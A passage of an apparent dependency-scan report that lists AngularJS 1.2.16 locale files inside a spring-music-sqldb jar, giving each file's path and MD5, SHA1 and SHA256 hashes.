spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-ma.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-ma.jsMD5: ab12d975d77ff659ee4e99a523e2f2eaSHA1: ab53177cf4c8dee84b2ae48540f51dedb71721aeSHA256: e0ca412bc19f78a219ba091843d2894b8c1bbeeacd52b340d643f3f5acc78d7a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-om.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-om.jsMD5: e883191a5f5b7b63bf60c434abeb2b29SHA1: 1580f1503b55fd0d93a5f3e892a21e61356400bfSHA256: 6917f819cadca52f215958718b8192d6f21b9804775d06c9fa43f7e258a59ccd
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-qa.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-qa.jsMD5: 433f00ff8d6afaa109c083ae8a3e0a38SHA1: 012b10d49f3cbe952ec21030bb2dd21b587f8aafSHA256: a1e599b972f47694a45d7658f2c5ae0a69381f00c3d415f7773c6cdf90414d70
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-sa.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-sa.jsMD5: 015c2cb899d3fd2d92e62b0200c67defSHA1: c224ba8ac2746633056ea4ffcc483037577bfdf4SHA256: 7ec214ed1ec29ec718e79f4e652a32ebfe2c6e841cda212b27f5a53fabaf47b7
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-sd.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-sd.jsMD5: c10ad54ab0afff6e603ab8c9642a281dSHA1: 8d8dcd06f0ee7dc2702bfda3302e8aefdba1e7c6SHA256: c7f63e47dbb16122f671e08196768c72741983cd5a55f51ba2b62ea84946647d
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-sy.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-sy.jsMD5: d84c814380e69e73f5a3bbfdcca08501SHA1: ae8a0498e857efc1e3757c1648d69b71d42c51afSHA256: 2d856bc816bc75553263899c8a77d7c554a3497305ec2374e163e121de54ee9a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-tn.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-tn.jsMD5: 9aad40f8c0579f947d53bfb0cbe70262SHA1: 2f661457996763737bdd53f96f41166f8761400eSHA256: 519ae7417da58d04b199bb067004353c1683b0d8f56cacee4b74c0f9a3fc6b95
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar-ye.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar-ye.jsMD5: ee7c1c079a8e905ecfd8a48484594c2cSHA1: eb67c8499dd57160629b2c32fff56ff8f4117f99SHA256: cdd636b7955f7ea1f7add9b42196904188402cdfe80b9ebb3241c599af5e03a3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ar.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ar.jsMD5: 71b4a9f1b52aec131c59d7b37626735dSHA1: da2fbde5c6c6d4fce2e966623d61b40cb21d7623SHA256: 249be3f455f268e2a0ce01a9d1fc8ae88f26e369fd0c059472e0219e233a6c8a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_bg-bg.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_bg-bg.jsMD5: e0b0af6d14a5f281402adea4b3d26be0SHA1: a38f62aed54b72217f9abf38a8c7ffcf1d99a819SHA256: 82eee0539d08160c6ddda07c13842aacfd877a6343a8a6d56bc10812f4121231
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_bg.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_bg.jsMD5: b2da12ecd26851816dadd6817f616b20SHA1: 325daae5f701e669933e85919e83f8a157bbe058SHA256: a83b43bf1b4b4d0e0a0da47d4abca821025153b9922418dc924d77b941045337
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_bn-bd.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_bn-bd.jsMD5: 63fdb4d8f7211eea252b5fac1656787cSHA1: e68ce678d8f1bf527da56bf2fa20776968270640SHA256: 32e39352ffa4731775da9807e8747f81f16d4662a52903a215817c73d1c65c48
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_bn-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_bn-in.jsMD5: 9a663da5fb4e9894342c35908429e7e0SHA1: c7cc4bcfa0fcb4ca6169a8f412a04e79289947afSHA256: 6362b793bc56d1c0b64d4a8084ba78fc184be01e76807f020dd52531888d50f2
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_bn.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_bn.jsMD5: 58fe82417e29f022e3910a519ad0175eSHA1: 78c3ee3924d229847a80342bfbd5776e4bf7fb84SHA256: 9c4c9c19c7ef2422e5be6bac7e07da22cee886aa16efe923d2d5846c43465bc1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ca-ad.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ca-ad.jsMD5: 53f987b9e61a79830045822404d499cdSHA1: c0e0df4bbc2ac2dde95c713f40407067d5fbe8bdSHA256: 8aa3bf12da8cbc98ada898f3501b39ca1471a3dab4ec7e90e82add9f2b28e156
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ca-es.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ca-es.jsMD5: d5a6e9640510054866d6db19fcb045bcSHA1: 3f7b462e189d706d2dc2878ad88352d8cabc55eeSHA256: 4c3ba0caa6c9c69ee44932758336fc21ac850dc764d74814cf9696b2b9183712
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ca.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ca.jsMD5: fd6574916976f4302e040a98d5ae68afSHA1: 5303c63dc5446cecb51971ac598790d410021a46SHA256: 70b3eea53bcfea23f3f9b57c72fd330048cc6b5ae3c00171d6ad0519e83a53d5
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_cs-cz.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_cs-cz.jsMD5: 9f20481a32c7b1675fad3221eea25754SHA1: 811c113a9d45c7a2b53e4daa2641ed1b8c10ebdeSHA256: d5944be67aa45c3ec2fa8a63ba850de3bdfd0330ee20c0ea5e730549c8f434f2
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_cs.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_cs.jsMD5: e4c4ba9f974d61c6babc8241222ff035SHA1: be53a45be7e0e1cd7ed9b140470c6085368bbb81SHA256: c4227773b5bcec0cb55240cb05a0e7e0df7ed0d653524bf3de45ff33473a0982
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_da-dk.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_da-dk.jsMD5: b808c66da7bfe303bee5d7b23c9a9845SHA1: 06bbd9ab84f0820ca67ef22cfce34cb663e2fef4SHA256: 4704561c2d8437f91bc895f47199328218ac0c1a043c308585e9aff7e270fb32
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_da.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_da.jsMD5: 19462456bbf4af86ed5b42ecc7e625a9SHA1: 74cdecf31766b6f5427b6a79f9e35dca646d8c07SHA256: ea2ad8f5bf8bd456f489e97662353bbb0b5e18c5d6beddcf0f1d40c5f454b936
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_de-at.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_de-at.jsMD5: 13100bb6e65c61d6d803250c5be8824eSHA1: d396fa0a6252dfa8f86eb401964fba5dbb77ac15SHA256: 03b5b5ce053b104bef3db982d04691102a8ac061683559194f47e43813d8cd7d
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_de-be.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_de-be.jsMD5: e62301d93f4efb9865241c3950ea849dSHA1: a0dd7c45a1623373348d9ddfc31f37a6a07b487eSHA256: 546e93b89131993c17707a082f922f6e5089f3b9ee224350afe7ed2fcb920063
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_de-ch.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_de-ch.jsMD5: c0f7e65204ec741bbec5ff46213c60f4SHA1: af6e7d6c2ed1e3b6f4ee5478c7dab01f8decc667SHA256: 6e3bc2f181c9174fc797fbd4a45ee53ff29ca5656badcf2fe8f7766aa8213a42
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_de-de.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_de-de.jsMD5: 438a36f69eded7b21afb30c41dd4b9c2SHA1: 73b6b8b71c4b4e38fe42a13a179f86b580aa98e5SHA256: 1442adf571439cd6b587acd728f86d039fe2e4aee396318cfc9d25c2f7062a41
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_de-li.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_de-li.jsMD5: 2150eac9beb746fc7b5687f02e16a4d5SHA1: 7f224538c63b45ff3f58062c900d452e1946d210SHA256: e9c166f1de3e52346235c2dcfbafb804a5ea5f3cdfe82fc33115208dea013e00
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_de-lu.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_de-lu.jsMD5: 962d2fff44964fea31b328701a8ebe35SHA1: 4fc99b9f25096144eed73878cdc76514cb62460bSHA256: c80b7e1c18ded91d81fe00c31a7da23ab152978095c25da43e0a1152630ac46e
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_de.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_de.jsMD5: 0cbd57cfdfd8c04283b51cdaf18656c3SHA1: 08dad759d60ae6fc9704ed43c74fa9059294ad9eSHA256: 37f83d93f5ed5c6343bdfa8c7aa3996af806c7ad2493ac618085b41592bcbef9
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_el-cy.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_el-cy.jsMD5: 48951dfb41aaae0473bd6c4bc277f943SHA1: 6b04e46259feb221926f3b0cf3c1121a48e47374SHA256: 5bdb6e5b721f4cf728e8d55c74702b2a2a7ef6954e809c440c3d290fd2cc440e
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_el-gr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_el-gr.jsMD5: 3cb0f971b31475e0698a4398b18bb740SHA1: b0043435c3dced401c0808fcfabdf0e83386d43dSHA256: 6fe9c710512cd1f0e993a0652b4010e598b4cc03236a31b1dd8e91c685ef215b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_el.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_el.jsMD5: c8cda24631ae473a8ac84ee86f02d7edSHA1: 6e6f2ddb779d3a131e7aac15d2b3767a863f7013SHA256: f35040ff006e586c04b9c106a7adcd5c0dcb9e2499254bde3a308d7e122ec20f
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-as.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-as.jsMD5: 35c16b3b47c77794a5798ceef8c6e428SHA1: 6f44a2f4fce64414736eafa31d12de98a7abf6baSHA256: cfa3defc7d4d097cd2cf15d3c1ce6ab0e1d74acd83399dd430726792dbaccc1b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-au.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-au.jsMD5: 374a6caf7d85f336ad82503d4ce6a675SHA1: a95d2538b953d9f8e26d9995e89ebbeeab5e83b9SHA256: 99d9254369a1ebf3564b95734523abf34094acb482bb7a41dae4eddba03cf7f1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-bb.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-bb.jsMD5: 031add8af3425f24d3028ca9ed235daaSHA1: 067f5e5acf4ba4c573051a9a86967a0feae4786fSHA256: fad83154250ffd81fd140ff1e0d33059a0b4e057c6f8a7b37a9f1f3059784404
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-be.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-be.jsMD5: d30446728f122692abc88f07e432a2f5SHA1: e38e4c6fb1df013620797eff07258406e994fe6dSHA256: 0e4f3597916ed4bf8a35deea294abc7bc9a77aa577591573d81e7a305234219d
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-bm.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-bm.jsMD5: f2c4740dad24e778d9784cd29f82bf95SHA1: 6b3e016661e3ec8fa1e6dcd2f2b8bd705a7c8cd7SHA256: 7f6b98b6ca2cb7875339c08a5b6f6ec5aae2aad56dc16b8c748180e5f6b2ebe1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-bw.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-bw.jsMD5: 066b2196acb7a5a2695637524bf2a1b3SHA1: 8f2704500f855606b89e855142ea078d1db1dcf3SHA256: 07bed83f34131eda9193a37d0ee9000d2488449a439336922deef03938e5d844
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-bz.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-bz.jsMD5: be2bb7630218159c96d08352d39ee92cSHA1: b7877583af2521e36b8fe9f0b92f330f966e01f3SHA256: caaf4438f29771fdcf6b308831c46b82aa239e2ca36a1bddb9e328a8ea38c166
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-ca.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-ca.jsMD5: e34360aa3254f63513707d8db2b41739SHA1: 699fe3acfb9a8c05b7fd52da9605b50a563e5d91SHA256: 7e4e7d00a2e9fc62e92c51333348d2195e770d70cf809c351ebe23197eb66a26
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-dsrt-us.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-dsrt-us.jsMD5: bb5fe95899f5d8ac2eab66c00fca0704SHA1: 9c91fd81ac59a19d34e2e235992148154b475107SHA256: 05bfaa3d2d1f231d5a53a1c47d62ca07df88921ae2cddb9e0fb70ffc6d11dec5
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-dsrt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-dsrt.jsMD5: 4ed027983e6297a3d06fdf61ea3d6c82SHA1: 71ebc9f4e4d68b43e3a473b495a6604afb55ff22SHA256: cd9652d17bf06b68942d604f1281632c2dbaaf337ac015b3270f9202be87981d
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-fm.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-fm.jsMD5: 32fddd85c225c62b99b049cee3c21603SHA1: 81fca7ad164266b915002f3b954dceb92b7a4e59SHA256: 4f7b88726e0e9e0526343964f4c1ae2bdd5a30baae781fdfbed61efd9dc7752d
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-gb.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-gb.jsMD5: 90f51c35bd448ef65d6deb02bf0a8ce1SHA1: 9d576ddf423e42a3e069bf7377b512e0c51167fbSHA256: 3475b443189dbf42a5122f2991f2a4d4709fed70d595ef1c0c1c0bb2de9659ac
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-gu.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-gu.jsMD5: c922d47ed61b66d3d909dd0047d3f37fSHA1: 887bbbc041f136b2bcf2a330b265d990b8bed530SHA256: 83820e160a64482dced17829fea72cd8b0845211c76c90c9961889777d9447be
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-gy.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-gy.jsMD5: 2f7ed2629f740938e5ff6b95506b0a8cSHA1: a20c988b4ba464ae3fdb22ce6568fcc1c36194fbSHA256: a859d128a81a9a64be54c50ce6b8cdf9e26b61495708782ddf953cabbf0da8e5
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-hk.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-hk.jsMD5: d231ba6ec5b1ab9b01f89b54881b6d2fSHA1: 704e73d8e0d8779b37f8493ceaea6ab0b67424bcSHA256: 644988ff6ee84370537147d6e85587b837a7ac8f19b807750d812a2147d3a72a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-ie.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-ie.jsMD5: 815f1dc7172d5e792232b269d05e02e2SHA1: 0903bc4021ec00df1f8ae77c1ce67c4b20f730afSHA256: e025c3c44aa6cfda4b76cb2cfde4db4a3d874d5ff6a83f91ee57e04602341d56
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-in.jsMD5: b38b9bbb2a042bb637fa5933eb43e1ffSHA1: 8e21960a95c84fa9a99df594a1f326b121738ad7SHA256: 67b853f9869aedeeedd4c2866ceeddda37bfd47413a190fb329600ac3a1ed3f8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-iso.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-iso.jsMD5: ede75c21c243b6087d0d6ca0e2b23062SHA1: 3fe8120ccce072f8a4585631baf43ba84d64b08bSHA256: 57c304e1089b339d1df30117c8f1e474ae1f493621cfa5a50b60d6be31966a98
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-jm.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-jm.jsMD5: 0cb6da3d1eee6469bbf67a93e3a4a8f9SHA1: a382f8ca5a30dd8c72cb2585450d3c293a594b15SHA256: 9898f2eaeb3bea77d8e5d6e2bcc0a22acafb84c9128e79e000cca27a3f271aad
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-mh.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-mh.jsMD5: b8325e0602027616aeed79ffe3d114e4SHA1: 5acb0e488a19b61d47e0c4c960488b4a5b012fc1SHA256: c29d2dfac1825cdcfcda4ccc437cfbd4edcd4e384ac2eaef7f26fc9e2f4b5163
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-mp.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-mp.jsMD5: afdcea1f79a5ebf84b82139792271637SHA1: 900ae9720394cecc968d86500122c951fc643ccbSHA256: 6d298f41f6b8fbaf2c2954dea418280a911aed27809d5c3e40d223ea5e48774f
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-mt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-mt.jsMD5: 79e42f54b7805096fcdb9c30f28ee541SHA1: 18aba174ce7163ed0886c2ddd4f4d6f7f7fe5ccdSHA256: 3ec171e3ff6f196aff97f8ec52c3e16c9724f77b5ab561f5f10b44039924337a
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-mu.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-mu.jsMD5: 99604903560f47c67b39b268136e1e43SHA1: d2fa1f1b171ff3046944c4189baeb579ce6b329eSHA256: 70f71d4c93a23e3501735dade379cf924aafc8836fedfd05d6ad13a0fa4d0ac4
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-na.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-na.jsMD5: 7d85fc496d30a7c1947b984c516713a3SHA1: 075be389b2b89b785fdbc298b13f899955af6518SHA256: 9fd2d400d98a323c1c24369ce66331b4cbf8a953a13462aef9600e7bebfaf816
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_en-nz.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_en-nz.jsMD5: 5911465f1cd18b7dcacb3db5177614d0SHA1: 39c858315e1105473e86ed013d99b2c8a3c8141fSHA256: 24e8276ab79fc7bddcd32c8c97b6d45f0eaf98aca1acb68586dc83f685cafdba
Evidence Type Source Name Value Confidence
